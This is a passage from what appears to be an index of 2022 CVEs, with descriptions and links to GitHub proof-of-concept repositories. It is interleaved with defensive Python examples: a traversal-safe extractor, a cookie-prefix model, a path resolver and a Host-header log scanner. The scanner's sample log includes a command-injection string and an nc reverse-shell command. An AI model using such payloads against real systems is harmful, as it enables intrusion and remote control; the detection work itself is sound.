- [michealadams30/Cve-2022-30190](https://github.com/michealadams30/Cve-2022-30190)
- [melting0256/Enterprise-Cybersecurity](https://github.com/melting0256/Enterprise-Cybersecurity)
- [yrkuo/CVE-2022-30190](https://github.com/yrkuo/CVE-2022-30190)
- [ToxicEnvelope/FOLLINA-CVE-2022-30190](https://github.com/ToxicEnvelope/FOLLINA-CVE-2022-30190)
- [hycheng15/CVE-2022-30190](https://github.com/hycheng15/CVE-2022-30190)
- [aminetitrofine/CVE-2022-30190](https://github.com/aminetitrofine/CVE-2022-30190)
- [Muhammad-Ali007/Follina_MSDT_CVE-2022-30190](https://github.com/Muhammad-Ali007/Follina_MSDT_CVE-2022-30190)
- [Jump-Wang-111/AmzWord](https://github.com/Jump-Wang-111/AmzWord)
- [shri142/ZipScan](https://github.com/shri142/ZipScan)
- [alien-keric/CVE-2022-30190](https://github.com/alien-keric/CVE-2022-30190)
- [ethicalblue/Follina-CVE-2022-30190-Sample](https://github.com/ethicalblue/Follina-CVE-2022-30190-Sample)

### CVE-2022-30203 (2022-07-12)

Windows Boot Manager Security Feature Bypass Vulnerability

- [Wack0/dubiousdisk](https://github.com/Wack0/dubiousdisk)

### CVE-2022-30206 (2022-07-12)

Windows Print Spooler Elevation of Privilege Vulnerability

- [MagicPwnrin/CVE-2022-30206](https://github.com/MagicPwnrin/CVE-2022-30206)
- [Malwareman007/CVE-2022-30206](https://github.com/Malwareman007/CVE-2022-30206)

### CVE-2022-30216 (2022-07-12)

Windows Server Service Tampering Vulnerability

- [corelight/CVE-2022-30216](https://github.com/corelight/CVE-2022-30216)

### CVE-2022-30292 (2022-05-04)

Heap-based buffer overflow in sqbaselib.cpp in SQUIRREL 3.2 due to lack of a certain sq_reservestack call.

- [sprushed/CVE-2022-30292](https://github.com/sprushed/CVE-2022-30292)

### CVE-2022-30333 (2022-05-09)

RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected.

- [TheL1ghtVn/CVE-2022-30333-PoC](https://github.com/TheL1ghtVn/CVE-2022-30333-PoC)
- [rbowes-r7/unrar-cve-2022-30333-poc](https://github.com/rbowes-r7/unrar-cve-2022-30333-poc)
- [J0hnbX/CVE-2022-30333](https://github.com/J0hnbX/CVE-2022-30333)
- [aslitsecurity/Zimbra-CVE-2022-30333](https://github.com/aslitsecurity/Zimbra-CVE-2022-30333)
- [paradox0909/cve-2022-30333_online_rar_extracor](https://github.com/paradox0909/cve-2022-30333_online_rar_extracor)
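The write described above is the kind that name-only filtering misses: an archive can drop a symbolic link that resolves above the extraction directory and then follow it with an ordinary-looking file entry whose path runs through that link. The only check that holds is one that resolves what is already on disk before each write. The following is an added example, not code from UnRAR or from any repository listed here: a hardened extract routine driven by a constructed entry listing (there is no RAR parsing), with `SAMPLE_ENTRIES`, `is_contained`, `extract_entry` and `demo` as illustrative names.

```python
import os
import tempfile

# Constructed listing standing in for a crafted archive (no RAR parsing here):
# (kind, path inside the archive, symlink target or None), in extraction order.
SAMPLE_ENTRIES = [
    ("file", "readme.txt", None),
    ("symlink", "ssh", "../../.ssh"),        # hop 1: a link that points above the extraction root
    ("file", "ssh/authorized_keys", None),   # hop 2: a plain-looking path that writes through it
]


def is_contained(root, rel_path):
    """True iff root/rel_path, after following any symlinks already on disk, is still under root."""
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, rel_path))
    return target == root_real or target.startswith(root_real + os.sep)


def extract_entry(root, kind, name, link_target):
    """Write one entry under root, or return the reason it was refused."""
    if os.path.isabs(name) or ".." in name.split("/"):
        return "rejected: traversal in entry name"
    parent = os.path.dirname(name) or "."
    # Resolve the parent *before* creating anything: this is what catches hop 2 above,
    # whose name looks harmless but whose parent is a symlink the archive planted earlier.
    if not is_contained(root, parent):
        return "rejected: parent resolves outside root"
    # A link is judged by where it resolves from its own directory, not by its text.
    if kind == "symlink" and not is_contained(root, os.path.join(parent, link_target)):
        return "rejected: symlink escapes root"
    full = os.path.join(root, name)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    if kind == "symlink":
        os.symlink(link_target, full)
    else:
        with open(full, "wb") as fh:
            fh.write(b"")  # placeholder for the entry's data
    return "ok"


def naive_landing_path(root):
    """Where an extractor without these checks would write hop 2 after creating hop 1's link.
    Only the resolved path is computed; nothing is written outside root."""
    os.symlink("../../.ssh", os.path.join(root, "ssh"))
    return os.path.realpath(os.path.join(root, "ssh", "authorized_keys"))


def demo():
    """Returns (does the naive extractor escape root?, verdicts from the hardened extractor)."""
    with tempfile.TemporaryDirectory() as root:
        naive_landing_path(root)
        naive_escapes = not is_contained(root, "ssh/authorized_keys")
    with tempfile.TemporaryDirectory() as root:
        verdicts = [extract_entry(root, kind, name, target) for kind, name, target in SAMPLE_ENTRIES]
    return naive_escapes, verdicts


if __name__ == "__main__":
    print(demo())
```

The hardened run refuses hop 1, so hop 2 then lands harmlessly inside the root; the naive run shows hop 2 resolving to a path outside it. Checking `realpath` of the parent at write time, rather than validating entry names once up front, is what makes the ordering of entries irrelevant.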

### CVE-2022-30489 (2022-05-13)

WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi.

- [badboycxcc/XSS-CVE-2022-30489](https://github.com/badboycxcc/XSS-CVE-2022-30489)

### CVE-2022-30507
- [yosef0x01/CVE-2022-30507-PoC](https://github.com/yosef0x01/CVE-2022-30507-PoC)

### CVE-2022-30510 (2022-05-27)

School Dormitory Management System 1.0 is vulnerable to SQL Injection via reports/daily_collection_report.php:59.

- [bigzooooz/CVE-2022-30510](https://github.com/bigzooooz/CVE-2022-30510)

### CVE-2022-30511 (2022-05-27)

School Dormitory Management System 1.0 is vulnerable to SQL Injection via accounts/view_details.php:4.

- [bigzooooz/CVE-2022-30511](https://github.com/bigzooooz/CVE-2022-30511)

### CVE-2022-30512 (2022-05-27)

School Dormitory Management System 1.0 is vulnerable to SQL Injection via accounts/payment_history.php:31.

- [bigzooooz/CVE-2022-30512](https://github.com/bigzooooz/CVE-2022-30512)

### CVE-2022-30513 (2022-05-27)

School Dormitory Management System v1.0 is vulnerable to reflected cross-site scripting (XSS) via admin/inc/navigation.php:125.

- [bigzooooz/CVE-2022-30513](https://github.com/bigzooooz/CVE-2022-30513)

### CVE-2022-30514 (2022-05-27)

School Dormitory Management System v1.0 is vulnerable to reflected cross-site scripting (XSS) via admin/inc/navigation.php:126.

- [bigzooooz/CVE-2022-30514](https://github.com/bigzooooz/CVE-2022-30514)

### CVE-2022-30524 (2022-05-09)

There is an invalid memory access in the TextLine class in TextOutputDev.cc in Xpdf 4.0.4 because the text extractor mishandles characters at large y coordinates. It can be triggered by (for example) sending a crafted pdf file to the pdftotext binary, which allows a remote attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact.

- [rishvic/xpdf-docker](https://github.com/rishvic/xpdf-docker)

### CVE-2022-30525 (2022-05-12)

An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.

- [jbaines-r7/victorian_machinery](https://github.com/jbaines-r7/victorian_machinery)
- [Henry4E36/CVE-2022-30525](https://github.com/Henry4E36/CVE-2022-30525)
- [shuai06/CVE-2022-30525](https://github.com/shuai06/CVE-2022-30525)
- [savior-only/CVE-2022-30525](https://github.com/savior-only/CVE-2022-30525)
- [M4fiaB0y/CVE-2022-30525](https://github.com/M4fiaB0y/CVE-2022-30525)
- [k0sf/CVE-2022-30525](https://github.com/k0sf/CVE-2022-30525)
- [superzerosec/CVE-2022-30525](https://github.com/superzerosec/CVE-2022-30525)
- [Chocapikk/CVE-2022-30525-Reverse-Shell](https://github.com/Chocapikk/CVE-2022-30525-Reverse-Shell)
- [160Team/CVE-2022-30525](https://github.com/160Team/CVE-2022-30525)
- [iveresk/cve-2022-30525](https://github.com/iveresk/cve-2022-30525)
- [west9b/CVE-2022-30525](https://github.com/west9b/CVE-2022-30525)
- [furkanzengin/CVE-2022-30525](https://github.com/furkanzengin/CVE-2022-30525)
- [ProngedFork/CVE-2022-30525](https://github.com/ProngedFork/CVE-2022-30525)
- [cbk914/CVE-2022-30525_check](https://github.com/cbk914/CVE-2022-30525_check)
- [arajsingh-infosec/CVE-2022-30525_Exploit](https://github.com/arajsingh-infosec/CVE-2022-30525_Exploit)

### CVE-2022-30526 (2022-07-19)

A privilege escalation vulnerability was identified in the CLI command of Zyxel USG FLEX 100(W) firmware versions 4.50 through 5.30, USG FLEX 200 firmware versions 4.50 through 5.30, USG FLEX 500 firmware versions 4.50 through 5.30, USG FLEX 700 firmware versions 4.50 through 5.30, USG FLEX 50(W) firmware versions 4.16 through 5.30, USG20(W)-VPN firmware versions 4.16 through 5.30, ATP series firmware versions 4.32 through 5.30, VPN series firmware versions 4.30 through 5.30, USG/ZyWALL series firmware versions 4.09 through 4.72, which could allow a local attacker to execute some OS commands with root privileges in some directories on a vulnerable device.

- [greek0x0/CVE-2022-30526](https://github.com/greek0x0/CVE-2022-30526)

### CVE-2022-30591 (2022-07-06)

quic-go through 0.27.0 allows remote attackers to cause a denial of service (CPU consumption) via a Slowloris variant in which incomplete QUIC or HTTP/3 requests are sent. This occurs because mtu_discoverer.go misparses the MTU Discovery service and consequently overflows the probe timer. NOTE: the vendor's position is that this behavior should not be listed as a vulnerability on the CVE List.

- [efchatz/QUIC-attacks](https://github.com/efchatz/QUIC-attacks)

### CVE-2022-30592 (2022-05-11)

liblsquic/lsquic_qenc_hdl.c in LiteSpeed QUIC (aka LSQUIC) before 3.1.0 mishandles MAX_TABLE_CAPACITY.

- [efchatz/HTTP3-attacks](https://github.com/efchatz/HTTP3-attacks)

### CVE-2022-30594 (2022-05-12)

The Linux kernel before 5.17.2 mishandles seccomp permissions. The PTRACE_SEIZE code path allows attackers to bypass intended restrictions on setting the PT_SUSPEND_SECCOMP flag.

- [Lay0us/linux-4.19.72_CVE-2022-30594](https://github.com/Lay0us/linux-4.19.72_CVE-2022-30594)

### CVE-2022-30600 (2022-05-18)

A flaw was found in moodle where logic used to count failed login attempts could result in the account lockout threshold being bypassed.

- [Boonjune/POC-CVE-2022-30600](https://github.com/Boonjune/POC-CVE-2022-30600)

### CVE-2022-30778
- [kang8/CVE-2022-30778](https://github.com/kang8/CVE-2022-30778)

### CVE-2022-30780 (2022-06-11)

Lighttpd 1.4.56 through 1.4.58 allows a remote attacker to cause a denial of service (CPU consumption from stuck connections) because connection_read_header_more in connections.c has a typo that disrupts use of multiple read operations on large headers.

- [p0dalirius/CVE-2022-30780-lighttpd-denial-of-service](https://github.com/p0dalirius/CVE-2022-30780-lighttpd-denial-of-service)
- [xiw1ll/CVE-2022-30780_Checker](https://github.com/xiw1ll/CVE-2022-30780_Checker)

### CVE-2022-30781 (2022-05-16)

Gitea before 1.16.7 does not escape git fetch remote.

- [wuhan005/CVE-2022-30781](https://github.com/wuhan005/CVE-2022-30781)

### CVE-2022-30887 (2022-05-20)

Pharmacy Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted image file.

- [MuallimNaci/CVE-2022-30887](https://github.com/MuallimNaci/CVE-2022-30887)

### CVE-2022-30929 (2022-07-06)

Mini-Tmall v1.0 is vulnerable to Insecure Permissions via tomcat-embed-jasper.

- [nanaao/CVE-2022-30929](https://github.com/nanaao/CVE-2022-30929)

### CVE-2022-31007 (2022-05-31)

eLabFTW is an electronic lab notebook manager for research teams. Prior to version 4.3.0, a vulnerability allows an authenticated user with an administrator role in a team to assign itself system administrator privileges within the application, or create a new system administrator account. The issue has been corrected in eLabFTW version 4.3.0. In the context of eLabFTW, an administrator is a user account with certain privileges to manage users and content in their assigned team/teams. A system administrator account can manage all accounts, teams and edit system-wide settings within the application. The impact is not deemed as high, as it requires the attacker to have access to an administrator account. Regular user accounts cannot exploit this to gain admin rights. A workaround for one of the issues is removing the ability of administrators to create accounts.

- [gregscharf/CVE-2022-31007-Python-POC](https://github.com/gregscharf/CVE-2022-31007-Python-POC)

### CVE-2022-31061 (2022-06-28)

GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. In affected versions there is a SQL injection vulnerability which is possible on login page. No user credentials are required to exploit this vulnerability. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.

- [Wangyanan131/CVE-2022-31061](https://github.com/Wangyanan131/CVE-2022-31061)

### CVE-2022-31101 (2022-06-27)

prestashop/blockwishlist is a prestashop extension which adds a block containing the customer's wishlists. In affected versions an authenticated customer can perform SQL injection. This issue is fixed in version 2.1.1. Users are advised to upgrade. There are no known workarounds for this issue.

- [MathiasReker/blmvuln](https://github.com/MathiasReker/blmvuln)
- [karthikuj/CVE-2022-31101](https://github.com/karthikuj/CVE-2022-31101)

### CVE-2022-31138 (2022-07-11)

mailcow is a mailserver suite. Prior to mailcow-dockerized version 2022-06a, an extended privilege vulnerability can be exploited by manipulating the custom parameters regexmess, skipmess, regexflag, delete2foldersonly, delete2foldersbutnot, regextrans2, pipemess, or maxlinelengthcmd to execute arbitrary code. Users should update their mailcow instances with the `update.sh` script in the mailcow root directory to 2022-06a or newer to receive a patch for this issue. As a temporary workaround, the Syncjob ACL can be removed from all mailbox users, preventing changes to those settings.

- [ly1g3/Mailcow-CVE-2022-31138](https://github.com/ly1g3/Mailcow-CVE-2022-31138)

### CVE-2022-31144 (2022-07-19)

Redis is an in-memory database that persists on disk. A specially crafted `XAUTOCLAIM` command on a stream key in a specific state may result in a heap overflow, and potentially remote code execution. This problem affects versions on the 7.x branch prior to 7.0.4. The patch is released in version 7.0.4.

- [SpiralBL0CK/CVE-2022-31144](https://github.com/SpiralBL0CK/CVE-2022-31144)

### CVE-2022-31181 (2022-08-01)

PrestaShop is an Open Source e-commerce platform. In versions from 1.6.0.10 and before 1.7.8.7 PrestaShop is subject to an SQL injection vulnerability which can be chained to call PHP's Eval function on attacker input. The problem is fixed in version 1.7.8.7. Users are advised to upgrade. Users unable to upgrade may delete the MySQL Smarty cache feature.

- [drkbcn/lblfixer_cve_2022_31181](https://github.com/drkbcn/lblfixer_cve_2022_31181)

### CVE-2022-31188 (2022-08-01)

CVAT is an open-source interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. Validation has been added to URLs used in the affected code path in version 2.0.0. Users are advised to upgrade. There are no known workarounds for this issue.

- [emirpolatt/CVE-2022-31188](https://github.com/emirpolatt/CVE-2022-31188)

### CVE-2022-31245 (2022-05-20)

mailcow before 2022-05d allows a remote authenticated user to inject OS commands and escalate privileges to domain admin via the --debug option in conjunction with the ---PIPEMESS option in Sync Jobs.

- [ly1g3/Mailcow-CVE-2022-31245](https://github.com/ly1g3/Mailcow-CVE-2022-31245)

### CVE-2022-31262 (2022-08-17)

An exploitable local privilege escalation vulnerability exists in GOG Galaxy 2.0.46. Due to insufficient folder permissions, an attacker can hijack the %ProgramData%\GOG.com folder structure and change the GalaxyCommunication service executable to a malicious file, resulting in code execution as SYSTEM.

- [secure-77/CVE-2022-31262](https://github.com/secure-77/CVE-2022-31262)

### CVE-2022-31269 (2022-08-25)

Nortek Linear eMerge E3-Series devices through 0.32-09c place admin credentials in /test.txt that allow an attacker to open a building's doors. (This occurs in situations where the CVE-2019-7271 default credentials have been changed.)

- [Henry4E36/CVE-2022-31269](https://github.com/Henry4E36/CVE-2022-31269)
- [omarhashem123/CVE-2022-31269](https://github.com/omarhashem123/CVE-2022-31269)

### CVE-2022-31294 (2022-06-16)

An issue in the save_users() function of Online Discussion Forum Site 1 allows unauthenticated attackers to arbitrarily create or update user accounts.

- [bigzooooz/CVE-2022-31294](https://github.com/bigzooooz/CVE-2022-31294)

### CVE-2022-31295 (2022-06-16)

An issue in the delete_post() function of Online Discussion Forum Site 1 allows unauthenticated attackers to arbitrarily delete posts.

- [bigzooooz/CVE-2022-31295](https://github.com/bigzooooz/CVE-2022-31295)

### CVE-2022-31296 (2022-06-17)

Online Discussion Forum Site 1 was discovered to contain a blind SQL injection vulnerability via the component /odfs/posts/view_post.php.

- [bigzooooz/CVE-2022-31296](https://github.com/bigzooooz/CVE-2022-31296)

### CVE-2022-31297
- [bigzooooz/CVE-2022-31297](https://github.com/bigzooooz/CVE-2022-31297)

### CVE-2022-31298 (2022-06-16)

A cross-site scripting vulnerability in the ads comment section of Haraj v3.7 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.

- [bigzooooz/CVE-2022-31298](https://github.com/bigzooooz/CVE-2022-31298)

### CVE-2022-31299 (2022-06-16)

Haraj v3.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the User Upgrade Form.

- [bigzooooz/CVE-2022-31299](https://github.com/bigzooooz/CVE-2022-31299)

### CVE-2022-31300 (2022-06-16)

A cross-site scripting vulnerability in the DM Section component of Haraj v3.7 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.

- [bigzooooz/CVE-2022-31300](https://github.com/bigzooooz/CVE-2022-31300)

### CVE-2022-31301 (2022-06-16)

Haraj v3.7 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Post Ads component.

- [bigzooooz/CVE-2022-31301](https://github.com/bigzooooz/CVE-2022-31301)

### CVE-2022-31402 (2022-06-10)

ITOP v3.0.1 was discovered to contain a cross-site scripting (XSS) vulnerability via /itop/webservices/export-v2.php.

- [YavuzSahbaz/CVE-2022-31402](https://github.com/YavuzSahbaz/CVE-2022-31402)

### CVE-2022-31403 (2022-06-14)

ITOP v3.0.1 was discovered to contain a cross-site scripting (XSS) vulnerability via /itop/pages/ajax.render.php.

- [IbrahimEkimIsik/CVE-2022-31403](https://github.com/IbrahimEkimIsik/CVE-2022-31403)

### CVE-2022-31479 (2022-06-06)

An unauthenticated attacker can update the hostname with a specially crafted name that will allow for shell commands to be executed during the core collection process. This vulnerability impacts products based on HID Mercury Intelligent Controllers LP1501, LP1502, LP2500, LP4502, and EP4502 which contain firmware versions prior to 1.302 for the LP series and 1.296 for the EP series. An attacker with this level of access on the device can monitor all communications sent to and from this device, modify onboard relays, change configuration files, or cause the device to become unstable. The injected commands only get executed during start up or when unsafe calls regarding the hostname are used. This allows the attacker to gain remote access to the device and can make their persistence permanent by modifying the filesystem.

- [realyme/CVE-2022-31479-test](https://github.com/realyme/CVE-2022-31479-test)

### CVE-2022-31499 (2022-08-25)

Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256.

- [omarhashem123/CVE-2022-31499](https://github.com/omarhashem123/CVE-2022-31499)

### CVE-2022-31626 (2022-06-16)

In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when the pdo_mysql extension is used with the mysqlnd driver, if a third party is allowed to supply the host to connect to and the password for the connection, a password of excessive length can trigger a buffer overflow in PHP, which can lead to remote code execution.

- [amitlttwo/CVE-2022-31626](https://github.com/amitlttwo/CVE-2022-31626)

### CVE-2022-31629 (2022-09-28)

In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the vulnerability enables network and same-site attackers to set a standard insecure cookie in the victim's browser which is treated as a `__Host-` or `__Secure-` cookie by PHP applications.

- [silnex/CVE-2022-31629-poc](https://github.com/silnex/CVE-2022-31629-poc)
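The bypass turns on the name mangling PHP applies to request variables: leading spaces are dropped and every `.` or space in a name becomes `_`, so a cookie the browser knows as `..Host-session` (no prefix, hence none of the Secure/Path/Domain rules a browser enforces on `__Host-` names) is stored in `$_COOKIE['__Host-session']`, and a network attacker on a plaintext connection can set it. The following added example models that in Python; it is neither PHP's code nor the linked PoC. The hardened variant is a model of the fix (a prefixed key survives only when the raw name already carried the prefix), and `php_mangle`, `cookie_array_vulnerable`, `cookie_array_hardened`, `browser_accepts_set_cookie` and the constructed `ATTACK_COOKIE_HEADER` are illustrative names.

```python
COOKIE_PREFIXES = ("__Host-", "__Secure-")


def php_mangle(name):
    """Model of the name mangling PHP applies to request variables (GET/POST/COOKIE keys):
    leading spaces are dropped, then every '.' and ' ' becomes '_'."""
    name = name.lstrip(" ")
    return name.replace(".", "_").replace(" ", "_")


def parse_cookie_header(header):
    """Split a Cookie request header into (raw_name, value) pairs."""
    pairs = []
    for part in header.split(";"):
        if "=" not in part:
            continue
        raw, value = part.split("=", 1)
        pairs.append((raw.strip(), value.strip()))
    return pairs


def cookie_array_vulnerable(header):
    """Pre-fix behaviour: whatever the mangled name is becomes the $_COOKIE key."""
    return {php_mangle(raw): value for raw, value in parse_cookie_header(header)}


def cookie_array_hardened(header):
    """Post-fix behaviour as modelled here: a key may carry a cookie prefix only if the raw
    name sent by the browser already carried it, so mangling can never forge one."""
    out = {}
    for raw, value in parse_cookie_header(header):
        key = php_mangle(raw)
        if key.startswith(COOKIE_PREFIXES) and not raw.startswith(COOKIE_PREFIXES):
            continue  # the prefix appeared only through mangling: drop the cookie
        out[key] = value
    return out


def browser_accepts_set_cookie(name, secure, has_domain, path):
    """The prefix rules a browser enforces on Set-Cookie. They trigger only on the literal
    prefix, which is why a name such as '..Host-session' faces no restriction at all."""
    if name.startswith("__Host-"):
        return secure and not has_domain and path == "/"
    if name.startswith("__Secure-"):
        return secure
    return True


# Constructed attack: a plaintext (http://) response from a network attacker sets a cookie
# whose raw name has no prefix; the browser later sends it back alongside a benign cookie.
ATTACK_COOKIE_HEADER = "..Host-session=attacker-chosen; theme=dark"


def demo():
    """Returns the $_COOKIE array the vulnerable and the hardened parser build from the attack header."""
    return cookie_array_vulnerable(ATTACK_COOKIE_HEADER), cookie_array_hardened(ATTACK_COOKIE_HEADER)


if __name__ == "__main__":
    print(demo())
```

The practical consequence for application code: before the fix, `isset($_COOKIE['__Host-session'])` proved nothing about how the cookie reached the server, so any session-fixation or CSRF-token defence that relied on the prefix alone was hollow on those PHP versions.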

### CVE-2022-31691 (2022-11-04)

Spring Tools 4 for Eclipse version 4.16.0 and below as well as VSCode extensions such as Spring Boot Tools, Concourse CI Pipeline Editor, Bosh Editor and Cloudfoundry Manifest YML Support version 1.39.0 and below all use Snakeyaml library for YAML editing support. This library allows for some special syntax in the YAML that under certain circumstances allows for potentially harmful remote code execution by the attacker.

- [SpindleSec/CVE-2022-31691](https://github.com/SpindleSec/CVE-2022-31691)

### CVE-2022-31692 (2022-10-31)

Spring Security, versions 5.7 prior to 5.7.5 and 5.6 prior to 5.6.9 could be susceptible to authorization rules bypass via forward or include dispatcher types. Specifically, an application is vulnerable when all of the following are true: The application expects that Spring Security applies security to forward and include dispatcher types. The application uses the AuthorizationFilter either manually or via the authorizeHttpRequests() method. The application configures the FilterChainProxy to apply to forward and/or include requests (e.g. spring.security.filter.dispatcher-types = request, error, async, forward, include). The application may forward or include the request to a higher privilege-secured endpoint. The application configures Spring Security to apply to every dispatcher type via authorizeHttpRequests().shouldFilterAllDispatcherTypes(true).

- [SpindleSec/cve-2022-31692](https://github.com/SpindleSec/cve-2022-31692)
- [hotblac/cve-2022-31692](https://github.com/hotblac/cve-2022-31692)

### CVE-2022-31705 (2022-12-14)

VMware ESXi, Workstation, and Fusion contain a heap out-of-bounds write vulnerability in the USB 2.0 controller (EHCI). A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed.

- [s0duku/cve-2022-31705](https://github.com/s0duku/cve-2022-31705)

### CVE-2022-31749
- [jbaines-r7/hook](https://github.com/jbaines-r7/hook)
- [iveresk/cve-2022-31749](https://github.com/iveresk/cve-2022-31749)

### CVE-2022-31793 (2022-08-04)

do_request in request.c in muhttpd before 1.1.7 allows remote attackers to read arbitrary files by constructing a URL with a single character before a desired path on the filesystem. This occurs because the code skips over the first character when serving files. Arris NVG443, NVG599, NVG589, and NVG510 devices and Arris-derived BGW210 and BGW320 devices are affected.

- [xpgdgit/CVE-2022-31793](https://github.com/xpgdgit/CVE-2022-31793)
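The off-by-one above is worth seeing next to a correct resolver: dropping the first byte of the request-target only yields a path relative to the document root when that byte really was `/`; for `a/etc/passwd` it leaves `/etc/passwd`, which `open()` treats as absolute. The following added example (not muhttpd's code or the linked PoC) mirrors the faulty logic as `resolve_vulnerable` and sets a hardened `resolve_hardened` beside it; both names and the docroot `/var/www` are illustrative.

```python
import posixpath
from urllib.parse import unquote


def resolve_vulnerable(request_target):
    """Mirrors the faulty logic: drop the first byte of the request-target (assumed to be
    the leading '/') and open what remains relative to the document root. Any other first
    byte leaves an absolute path behind, which open() honours regardless of the cwd."""
    return request_target[1:]


def resolve_hardened(docroot, request_target):
    """Return (True, filesystem path) or (False, reason). Insists on a leading '/', decodes
    percent-escapes *before* normalising, then confines the result to the document root."""
    if not request_target.startswith("/"):
        return False, "request-target must begin with '/'"
    path = unquote(request_target.split("?", 1)[0].split("#", 1)[0])
    if "\x00" in path:
        return False, "NUL byte in path"
    docroot = posixpath.normpath(docroot)
    candidate = posixpath.normpath(posixpath.join(docroot, path.lstrip("/")))
    if candidate != docroot and not candidate.startswith(docroot + "/"):
        return False, "path escapes document root"
    return True, candidate


if __name__ == "__main__":
    for target in ("/index.html", "a/etc/passwd", "/../etc/passwd", "/%2e%2e/%2e%2e/etc/passwd"):
        print(repr(target), "->", repr(resolve_vulnerable(target)), resolve_hardened("/var/www", target))
```

`resolve_hardened` is purely lexical (it uses `posixpath`, so it runs the same on any host); a real server should additionally `realpath` the candidate so that a symlink inside the document root cannot point outside it.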

### CVE-2022-31798 (2022-08-25)

Nortek Linear eMerge E3-Series 0.32-07p devices are vulnerable to /card_scan.php?CardFormatNo= XSS with session fixation (via PHPSESSID) when they are chained together. This would allow an attacker to take over an admin account or a user account.

- [omarhashem123/CVE-2022-31798](https://github.com/omarhashem123/CVE-2022-31798)

### CVE-2022-31814 (2022-09-05)

pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.

- [EvergreenCartoons/SenselessViolence](https://github.com/EvergreenCartoons/SenselessViolence)
- [Madliife0/CVE-2022-31814](https://github.com/Madliife0/CVE-2022-31814)
- [TheUnknownSoul/CVE-2022-31814](https://github.com/TheUnknownSoul/CVE-2022-31814)
- [drcayber/RCE](https://github.com/drcayber/RCE)
- [Chocapikk/CVE-2022-31814](https://github.com/Chocapikk/CVE-2022-31814)
- [dkstar11q/CVE-2022-31814](https://github.com/dkstar11q/CVE-2022-31814)
- [Laburity/CVE-2022-31814](https://github.com/Laburity/CVE-2022-31814)
- [ArunHAtter/CVE-2022-31814](https://github.com/ArunHAtter/CVE-2022-31814)
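A Host header that reaches a shell is easy to spot after the fact, because a legitimate value is a hostname or IP literal with an optional port and nothing else. The following added example (not pfSense's or pfBlockerNG's code, nor any of the PoCs above) runs an allow-list check over constructed access-log lines; the log layout (`client "request-line" status "Host"`), the sample addresses and the names `classify_host` and `scan` are all assumptions for the illustration, not pfSense's real log format.

```python
import re

# Constructed access-log lines in a hypothetical layout:
#   client "request-line" status "Host header value"
# (pfSense's own web-server log format is not reproduced here).
SAMPLE_LOG = """\
203.0.113.5 "GET /pfblockerng/www/index.php HTTP/1.1" 200 "firewall.example.internal"
203.0.113.9 "GET /pfblockerng/www/index.php HTTP/1.1" 200 "firewall.example.internal:8443"
198.51.100.7 "GET /pfblockerng/www/index.php HTTP/1.1" 200 "' *; echo id > /tmp/x #"
198.51.100.7 "GET /pfblockerng/www/index.php HTTP/1.1" 200 "$(nc 198.51.100.7 4444 -e /bin/sh)"
192.0.2.44 "GET / HTTP/1.1" 200 "[2001:db8::1]:443"
"""

LINE_RE = re.compile(r'^(?P<client>\S+) "(?P<request>[^"]*)" (?P<status>\d{3}) "(?P<host>[^"]*)"$')

# Allow-list grammar for a Host value: hostname/IPv4 labels or a bracketed IPv6 literal, optional port.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"^(?:{LABEL}(?:\.{LABEL})*\.?|\[[0-9A-Fa-f:.]+\])(?::\d{{1,5}})?$")
# Characters that let a value break out of a shell command line.
SHELL_META = re.compile(r"""[;&|`$'"(){}<>\\\n]""")


def classify_host(host):
    """None for a well-formed Host value, otherwise a short reason string."""
    if HOST_RE.match(host):
        return None
    if SHELL_META.search(host):
        return "shell metacharacters in Host header"
    return "malformed Host header"


def scan(log_text):
    """Return (line number, client, host value, reason) for every suspicious line."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if m is None:
            continue
        reason = classify_host(m["host"])
        if reason:
            hits.append((lineno, m["client"], m["host"], reason))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Matching against the allow-list first, and only then looking for metacharacters, keeps the rule useful beyond this one bug: anything that is not a syntactically valid Host value is surfaced, whether or not it happens to contain a character the shell cares about.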

### CVE-2022-31854 (2022-07-07)

Codoforum v5.1 was discovered to contain an arbitrary file upload vulnerability via the logo change option in the admin panel.

